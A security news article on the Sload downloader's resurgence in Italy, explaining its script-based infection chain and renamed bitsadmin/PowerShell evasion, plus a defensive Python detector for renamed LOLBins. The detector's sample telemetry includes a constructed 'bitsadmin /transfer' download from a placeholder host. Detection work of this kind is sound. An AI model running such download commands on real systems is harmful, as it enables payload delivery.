Minerva Labs researchers reported a comeback of Sload, a notorious malware downloader. This year, they say, Sload infections are coming from Italian endpoints.
Sload is a type of computer virus that collects and exfiltrates information from the infected device and can drop additional payloads on behalf of its operator. It is considered one of the most dangerous types of malware in recent years. A downloader will deliver additional malware only if the target has been deemed financially attractive.
Sload has been targeting victims mostly in Europe since at least 2018, with the majority of reported attacks occurring in the UK and Italy.
Instead of using an executable or a document to infiltrate machines, Sload’s developers use Windows native scripts – VBS and PowerShell – and rely on spear-phishing to trick users into executing them.
The downloader is an ever-developing project, the first stage script of which has been continuously updated, while the main module remains largely unchanged.
Minerva Labs explains that the infection chain begins by downloading a PowerShell script with the help of a rogue LNK file. The PowerShell script is then launched to download and execute Sload. Later variants rely on WSF/VBS scripts instead.
Minerva Labs has seen Sload infections from Italian endpoints increasing significantly over the past year.
The initial script used in these attacks consistently receives a low detection score on VirusTotal and is designed to bypass security tools such as EDR. Researchers encountered an obfuscated WSF script that can covertly download and run a remote payload. The trick works by renaming copies of the legitimate Windows binaries “bitsadmin.exe” and “Powershell.exe”, after which the PowerShell script is loaded into memory and begins execution.
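Renaming a copy of bitsadmin.exe or powershell.exe changes the file name but not the PE version information inside the binary, so process-creation telemetry that records the original file name still exposes the trick. The following is an added example written for this article, not code from Minerva Labs: it scans Sysmon Event ID 1 style records (fields `Image`, `OriginalFileName`, `ParentImage`, `CommandLine`) and flags a watched binary running under a different name, a script host (wscript.exe/cscript.exe) launching one of those binaries, and a bitsadmin download job. The log lines are constructed for illustration; the `OriginalFileName` values are the ones the genuine Windows binaries carry, and the field names are assumed to match Sysmon's JSON export.

```python
"""Detect renamed LOLBins (bitsadmin.exe / powershell.exe) in process-creation
telemetry. Added example, not from the Minerva Labs report; sample records are
constructed and follow Sysmon Event ID 1 field names (assumption)."""
import json
import ntpath

# PE version-info OriginalFileName values of the genuine binaries, lower-cased.
WATCHED_ORIGINAL_NAMES = {"bitsadmin.exe", "powershell.exe"}

# Script hosts under which a WSF/VBS dropper would run.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename_lower(path):
    """Case-insensitive file name of a Windows path (ntpath handles backslashes)."""
    return ntpath.basename(path or "").lower()


def classify(event):
    """Return a list of finding strings for one process-creation event."""
    findings = []
    image = basename_lower(event.get("Image"))
    original = (event.get("OriginalFileName") or "").lower()
    parent = basename_lower(event.get("ParentImage"))
    cmdline = (event.get("CommandLine") or "").lower()

    # On-disk name differs from the name baked into the PE: a renamed copy.
    if original in WATCHED_ORIGINAL_NAMES and image != original:
        findings.append(f"renamed-lolbin: {original} running as {image}")
    # A script engine spawning bitsadmin/powershell matches the WSF dropper chain.
    if parent in SCRIPT_HOSTS and original in WATCHED_ORIGINAL_NAMES:
        findings.append(f"script-host-spawn: {parent} -> {original}")
    # bitsadmin /transfer is the download primitive a downloader would use.
    if original == "bitsadmin.exe" and "/transfer" in cmdline:
        findings.append("bitsadmin-transfer: download job requested")
    return findings


def scan(lines):
    """Parse JSON lines; return {ProcessId: findings} for events with hits only.
    Blank or non-JSON lines are skipped rather than aborting the scan."""
    hits = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings = classify(event)
        if findings:
            hits[event.get("ProcessId")] = findings
    return hits


# Constructed sample telemetry: two benign launches, two renamed copies spawned
# by wscript.exe, and one junk line. Paths and the host name are placeholders.
SAMPLE_LOG = r"""
{"ProcessId": 4088, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "bitsadmin /list"}
{"ProcessId": 4102, "Image": "C:\\Users\\Public\\update.exe", "OriginalFileName": "bitsadmin.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "update.exe /transfer j1 /download /priority high http://example.invalid/p.txt C:\\Users\\Public\\p.txt"}
{"ProcessId": 4110, "Image": "C:\\Users\\Public\\ps.exe", "OriginalFileName": "PowerShell.EXE", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "ps.exe -File C:\\Users\\Public\\p.ps1"}
{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "OriginalFileName": "PowerShell.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
not-json garbage line
"""

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_LOG.splitlines()).items():
        print(pid, findings)
```

The check keys on `OriginalFileName` rather than on the on-disk name because the former survives a rename; a copy placed under a new name in a user-writable directory is exactly the case the report describes. Pairing it with the parent process adds context a single indicator lacks: bitsadmin under cmd.exe is routine administration, while bitsadmin or PowerShell under a script host is the dropper chain.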
This downloader’s final payloads were reported to be the Ramnit and Trickbot banking trojans, which can collect large amounts of data from users and even lead to ransomware attacks.